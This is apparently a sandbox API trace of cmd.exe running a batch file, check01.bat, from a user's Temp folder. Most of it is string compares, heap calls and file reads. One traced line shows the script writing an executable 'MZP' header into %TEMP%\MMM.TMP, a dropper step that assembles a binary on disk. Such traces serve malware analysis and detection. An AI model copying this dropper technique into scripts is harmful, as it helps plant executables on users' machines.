[0375.563] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78
[0375.563] _wcsicmp (_String1="\"C", _String2="MD") returned -75
[0375.563] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75
[0375.563] _wcsicmp (_String1="\"C", _String2="RD") returned -80
[0375.563] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80
[0375.563] _wcsicmp (_String1="\"C", _String2="PATH") returned -78
[0375.563] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69
[0375.563] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81
[0375.563] _wcsicmp (_String1="\"C", _String2="CLS") returned -65
[0375.563] _wcsicmp (_String1="\"C", _String2="CALL") returned -65
[0375.563] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84
[0375.563] _wcsicmp (_String1="\"C", _String2="VER") returned -84
[0375.564] _wcsicmp (_String1="\"C", _String2="VOL") returned -84
[0375.564] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67
[0375.564] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81
[0375.564] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67
[0375.564] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82
[0375.564] _wcsicmp (_String1="\"C", _String2="START") returned -81
[0375.564] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66
[0375.564] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73
[0375.564] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75
[0375.564] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78
[0375.564] _wcsicmp (_String1="\"C", _String2="POPD") returned -78
[0375.564] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63
[0375.564] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68
[0375.564] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64
[0375.564] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65
[0375.564] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75
[0375.565] _wcsicmp (_String1="\"C", _String2="FOR") returned -68
[0375.565] _wcsicmp (_String1="\"C", _String2="IF") returned -71
[0375.565] _wcsicmp (_String1="\"C", _String2="REM") returned -80
[0375.565] GetProcessHeap () returned 0x200000
[0375.565] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x218) returned 0x219ef0
[0375.565] GetProcessHeap () returned 0x200000
[0375.565] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x7a) returned 0x21a110
[0375.569] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51
[0375.569] GetProcessHeap () returned 0x200000
[0375.569] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x420) returned 0x201320
[0375.569] SetErrorMode (uMode=0x0) returned 0x0
[0375.570] SetErrorMode (uMode=0x1) returned 0x0
[0375.570] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x201330, lpFilePart=0x1ef400 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x1ef400*="Temp") returned 0x24
[0375.570] SetErrorMode (uMode=0x0) returned 0x1
[0375.570] GetProcessHeap () returned 0x200000
[0375.570] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201320, Size=0x72) returned 0x201320
[0375.570] GetProcessHeap () returned 0x200000
[0375.570] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201320) returned 0x72
[0375.570] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\.") returned 1
[0375.570] GetProcessHeap () returned 0x200000
[0375.571] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x60) returned 0x21a1a0
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xac) returned 0x21a210
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21a210, Size=0x60) returned 0x21a210
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21a210) returned 0x60
[0375.571] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0375.571] GetProcessHeap () returned 0x200000
[0375.571] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21a280
[0375.585] GetProcessHeap () returned 0x200000
[0375.585] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21a280, Size=0x7e) returned 0x21a280
[0375.585] GetProcessHeap () returned 0x200000
[0375.585] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21a280) returned 0x7e
[0375.586] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0375.586] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), fInfoLevelId=0x1, lpFindFileData=0x1ef170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef170) returned 0x21a310
[0375.586] GetProcessHeap () returned 0x200000
[0375.586] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x28) returned 0x2146e0
[0375.586] FindClose (in: hFindFile=0x21a310 | out: hFindFile=0x21a310) returned 1
[0375.587] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1
[0375.587] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0
[0375.587] GetConsoleTitleW (in: lpConsoleTitle=0x1ef6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.587] GetProcessHeap () returned 0x200000
[0375.587] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1e8) returned 0x2013b0
[0375.588] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff870000
[0375.601] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferIdentifyLevel") returned 0x7feff88e470
[0375.601] IdentifyCodeAuthzLevelW () returned 0x1
[0375.619] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff88f9b0
[0375.619] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
[0375.620] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferCloseLevel") returned 0x7feff88f660
[0375.620] CloseCodeAuthzLevel () returned 0x1
[0375.620] SetErrorMode (uMode=0x0) returned 0x0
[0375.621] SetErrorMode (uMode=0x1) returned 0x0
[0375.621] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x219f00, lpFilePart=0x1ef4f0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x1ef4f0*="check01.bat") returned 0x30
[0375.621] SetErrorMode (uMode=0x0) returned 0x1
[0375.621] GetProcessHeap () returned 0x200000
[0375.621] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x76) returned 0x201c30
[0375.621] wcsspn (_String=" ", _Control=" \x09") returned 0x1
[0375.621] GetProcessHeap () returned 0x200000
[0375.621] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x12) returned 0x22a370
[0375.621] GetProcessHeap () returned 0x200000
[0375.621] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x14) returned 0x22a390
[0375.621] GetProcessHeap () returned 0x200000
[0375.622] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x22a390, Size=0x14) returned 0x22a3b0
[0375.622] GetProcessHeap () returned 0x200000
[0375.622] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x22a3b0) returned 0x14
[0375.622] CmdBatNotification () returned 0x0
[0375.623] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60
[0375.623] _open_osfhandle (_OSFileHandle=0x60, _Flags=8) returned 3
[0375.623] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.623] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0375.623] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.623] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0375.624] ReadFile (in: hFile=0x60, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xf32, lpOverlapped=0x0) returned 1
[0375.626] SetFilePointer (in: hFile=0x60, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.627] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@echo off\r\n", cbMultiByte=11, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11
[0375.627] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.627] GetFileType (hFile=0x60) returned 0x1
[0375.627] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.627] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.628] GetProcessHeap () returned 0x200000
[0375.628] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21c5b0
[0375.628] GetProcessHeap () returned 0x200000
[0375.629] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0375.629] GetProcessHeap () returned 0x200000
[0375.629] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x201cb0
[0375.630] _wcsicmp (_String1="echo", _String2=")") returned 60
[0375.630] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0375.631] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0375.631] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0375.631] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0375.631] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0375.631] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0375.631] GetProcessHeap () returned 0x200000
[0375.631] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x201d70
[0375.631] GetProcessHeap () returned 0x200000
[0375.631] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x214710
[0375.631] GetProcessHeap () returned 0x200000
[0375.631] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b060
[0375.635] _tell (_FileHandle=3) returned 11
[0375.635] _close (_FileHandle=3) returned 0
[0375.635] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0375.635] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0375.635] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0375.635] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0375.636] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0375.636] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0375.636] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0375.636] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0375.636] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0375.636] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0375.636] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.637] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0375.637] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0375.637] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0375.637] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0375.637] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0375.637] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0375.637] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0375.637] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0375.637] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0375.638] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0375.638] GetProcessHeap () returned 0x200000
[0375.638] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b090
[0375.639] GetProcessHeap () returned 0x200000
[0375.639] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21b090, Size=0x1a) returned 0x21b0c0
[0375.639] GetProcessHeap () returned 0x200000
[0375.639] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b0c0) returned 0x1a
[0375.639] GetProcessHeap () returned 0x200000
[0375.639] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b090
[0375.639] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0
[0375.639] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.639] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0375.640] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.640] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0375.641] _get_osfhandle (_FileHandle=0) returned 0x3
[0375.641] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0375.641] SetConsoleInputExeNameW () returned 0x1
[0375.641] GetConsoleOutputCP () returned 0x1b5
[0375.642] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0375.642] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0375.642] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60
[0375.642] _open_osfhandle (_OSFileHandle=0x60, _Flags=8) returned 3
[0375.642] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.642] SetFilePointer (in: hFile=0x60, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b060 | out: hHeap=0x200000) returned 1
[0375.643] GetProcessHeap () returned 0x200000
[0375.643] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x214710 | out: hHeap=0x200000) returned 1
[0375.644] GetProcessHeap () returned 0x200000
[0375.644] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0375.644] GetProcessHeap () returned 0x200000
[0375.645] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201cb0 | out: hHeap=0x200000) returned 1
[0375.645] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.645] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb
[0375.645] ReadFile (in: hFile=0x60, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xf27, lpOverlapped=0x0) returned 1
[0375.646] SetFilePointer (in: hFile=0x60, lDistanceToMove=51, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.646] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :writeHex 4D5A50 \"%TEMP%\\MMM.TMP\"\r\n", cbMultiByte=40, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="call :writeHex 4D5A50 \"%TEMP%\\MMM.TMP\"\r\n") returned 40
[0375.648] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.649] GetFileType (hFile=0x60) returned 0x1
[0375.649] _get_osfhandle (_FileHandle=3) returned 0x60
[0375.649] SetFilePointer (in: hFile=0x60, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.649] GetProcessHeap () returned 0x200000
[0375.649] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21c5b0
[0375.649] GetProcessHeap () returned 0x200000
[0375.649] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x22a820
[0375.650] GetProcessHeap () returned 0x200000
[0375.654] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x214710
[0375.655] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0375.655] GetProcessHeap () returned 0x200000
[0375.655] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x214710 | out: hHeap=0x200000) returned 1
[0375.655] GetProcessHeap () returned 0x200000
[0375.655] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0375.655] GetProcessHeap () returned 0x200000
[0375.656] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0375.657] _wcsicmp (_String1="call", _String2=")") returned 58
[0375.657] _wcsicmp (_String1="FOR", _String2="call") returned 3
[0375.657] _wcsicmp (_String1="FOR/?", _String2="call") returned 3
[0375.657] _wcsicmp (_String1="IF", _String2="call") returned 6
[0375.657] _wcsicmp (_String1="IF/?", _String2="call") returned 6
[0375.657] _wcsicmp (_String1="REM", _String2="call") returned 15
[0375.657] _wcsicmp (_String1="REM/?", _String2="call") returned 15
[0375.657] GetProcessHeap () returned 0x200000
[0375.657] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x201cb0
[0375.657] GetProcessHeap () returned 0x200000
[0375.657] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x214710
[0375.662] GetProcessHeap () returned 0x200000
[0375.662] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x92) returned 0x201d70
[0375.664] _tell (_FileHandle=3) returned 51
[0375.664] _close (_FileHandle=3) returned 0
[0375.665] _wcsicmp (_String1="call", _String2="DIR") returned -1
[0375.665] _wcsicmp (_String1="call", _String2="ERASE") returned -2
[0375.665] _wcsicmp (_String1="call", _String2="DEL") returned -1
[0375.665] _wcsicmp (_String1="call", _String2="TYPE") returned -17
[0375.665] _wcsicmp (_String1="call", _String2="COPY") returned -14
[0375.665] _wcsicmp (_String1="call", _String2="CD") returned -3
[0375.665] _wcsicmp (_String1="call", _String2="CHDIR") returned -7
[0375.665] _wcsicmp (_String1="call", _String2="RENAME") returned -15
[0375.665] _wcsicmp (_String1="call", _String2="REN") returned -15
[0375.665] _wcsicmp (_String1="call", _String2="ECHO") returned -2
[0375.665] _wcsicmp (_String1="call", _String2="SET") returned -16
[0375.665] _wcsicmp (_String1="call", _String2="PAUSE") returned -13
[0375.665] _wcsicmp (_String1="call", _String2="DATE") returned -1
[0375.665] _wcsicmp (_String1="call", _String2="TIME") returned -17
[0375.666] _wcsicmp (_String1="call", _String2="PROMPT") returned -13
[0375.666] _wcsicmp (_String1="call", _String2="MD") returned -10
[0375.666] _wcsicmp (_String1="call", _String2="MKDIR") returned -10
[0375.666] _wcsicmp (_String1="call", _String2="RD") returned -15
[0375.666] _wcsicmp (_String1="call", _String2="RMDIR") returned -15
[0375.666] _wcsicmp (_String1="call", _String2="PATH") returned -13
[0375.666] _wcsicmp (_String1="call", _String2="GOTO") returned -4
[0375.666] _wcsicmp (_String1="call", _String2="SHIFT") returned -16
[0375.666] _wcsicmp (_String1="call", _String2="CLS") returned -11
[0375.666] _wcsicmp (_String1="call", _String2="CALL") returned 0
[0375.666] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.667] _wcsicmp (_String1="call", _String2="DIR") returned -1
[0375.667] _wcsicmp (_String1="call", _String2="ERASE") returned -2
[0375.667] _wcsicmp (_String1="call", _String2="DEL") returned -1
[0375.667] _wcsicmp (_String1="call", _String2="TYPE") returned -17
[0375.667] _wcsicmp (_String1="call", _String2="COPY") returned -14
[0375.667] _wcsicmp (_String1="call", _String2="CD") returned -3
[0375.667] _wcsicmp (_String1="call", _String2="CHDIR") returned -7
[0375.667] _wcsicmp (_String1="call", _String2="RENAME") returned -15
[0375.667] _wcsicmp (_String1="call", _String2="REN") returned -15
[0375.668] _wcsicmp (_String1="call", _String2="ECHO") returned -2
[0375.668] _wcsicmp (_String1="call", _String2="SET") returned -16
[0375.668] _wcsicmp (_String1="call", _String2="PAUSE") returned -13
[0375.668] _wcsicmp (_String1="call", _String2="DATE") returned -1
[0375.668] _wcsicmp (_String1="call", _String2="TIME") returned -17
[0375.668] _wcsicmp (_String1="call", _String2="PROMPT") returned -13
[0375.668] _wcsicmp (_String1="call", _String2="MD") returned -10
[0375.668] _wcsicmp (_String1="call", _String2="MKDIR") returned -10
[0375.668] _wcsicmp (_String1="call", _String2="RD") returned -15
[0375.668] _wcsicmp (_String1="call", _String2="RMDIR") returned -15
[0375.668] _wcsicmp (_String1="call", _String2="PATH") returned -13
[0375.668] _wcsicmp (_String1="call", _String2="GOTO") returned -4
[0375.668] _wcsicmp (_String1="call", _String2="SHIFT") returned -16
[0375.668] _wcsicmp (_String1="call", _String2="CLS") returned -11
[0375.668] _wcsicmp (_String1="call", _String2="CALL") returned 0
[0375.668] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x114) returned 0x21c5b0
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21c5b0, Size=0x92) returned 0x21c5b0
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21c5b0) returned 0x92
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x9c) returned 0x21c660
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x218) returned 0x21c710
[0375.669] GetProcessHeap () returned 0x200000
[0375.669] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22a820
[0375.670] GetProcessHeap () returned 0x200000
[0375.670] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0375.671] IdentifyCodeAuthzLevelW () returned 0x1
[0375.681] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
[0375.681] CloseCodeAuthzLevel () returned 0x1
[0375.681] GetProcessHeap () returned 0x200000
[0375.681] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b0c0
[0375.681] wcsspn (_String=" 4D5A50 \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"", _Control=" \x09") returned 0x1
[0375.681] GetProcessHeap () returned 0x200000
[0375.681] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x7c) returned 0x21cc70
[0375.681] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21cd00
[0375.682] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cd00, Size=0x7e) returned 0x21cd00
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cd00) returned 0x7e
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x21cd90
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b090
[0375.682] GetProcessHeap () returned 0x200000
[0375.682] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x24) returned 0x21b0f0
[0375.682] _wcsicmp (_String1="GOTO", _String2="DIR") returned 3
[0375.683] _wcsicmp (_String1="GOTO", _String2="ERASE") returned 2
[0375.683] _wcsicmp (_String1="GOTO", _String2="DEL") returned 3
[0375.683] _wcsicmp (_String1="GOTO", _String2="TYPE") returned -13
[0375.683] _wcsicmp (_String1="GOTO", _String2="COPY") returned 4
[0375.683] _wcsicmp (_String1="GOTO", _String2="CD") returned 4
[0375.683] _wcsicmp (_String1="GOTO", _String2="CHDIR") returned 4
[0375.683] _wcsicmp (_String1="GOTO", _String2="RENAME") returned -11
[0375.683] _wcsicmp (_String1="GOTO", _String2="REN") returned -11
[0375.683] _wcsicmp (_String1="GOTO", _String2="ECHO") returned 2
[0375.683] _wcsicmp (_String1="GOTO", _String2="SET") returned -12
[0375.683] _wcsicmp (_String1="GOTO", _String2="PAUSE") returned -9
[0375.683] _wcsicmp (_String1="GOTO", _String2="DATE") returned 3
[0375.683] _wcsicmp (_String1="GOTO", _String2="TIME") returned -13
[0375.683] _wcsicmp (_String1="GOTO", _String2="PROMPT") returned -9
[0375.683] _wcsicmp (_String1="GOTO", _String2="MD") returned -6
[0375.683] _wcsicmp (_String1="GOTO", _String2="MKDIR") returned -6
[0375.684] _wcsicmp (_String1="GOTO", _String2="RD") returned -11
[0375.684] _wcsicmp (_String1="GOTO", _String2="RMDIR") returned -11
[0375.684] _wcsicmp (_String1="GOTO", _String2="PATH") returned -9
[0375.684] _wcsicmp (_String1="GOTO", _String2="GOTO") returned 0
[0375.684] GetConsoleTitleW (in: lpConsoleTitle=0x1eecd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.685] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x216cf0, Size=0x24) returned 0x21b120
[0375.685] GetProcessHeap () returned 0x200000
[0375.685] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b120) returned 0x24
[0375.685] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee788, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c
[0375.685] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0375.685] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] SetFilePointer (in: hFile=0x5c, lDistanceToMove=51, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.686] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf32
[0375.686] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
[0375.686] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.686] GetFileType (hFile=0x5c) returned 0x1
[0375.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33
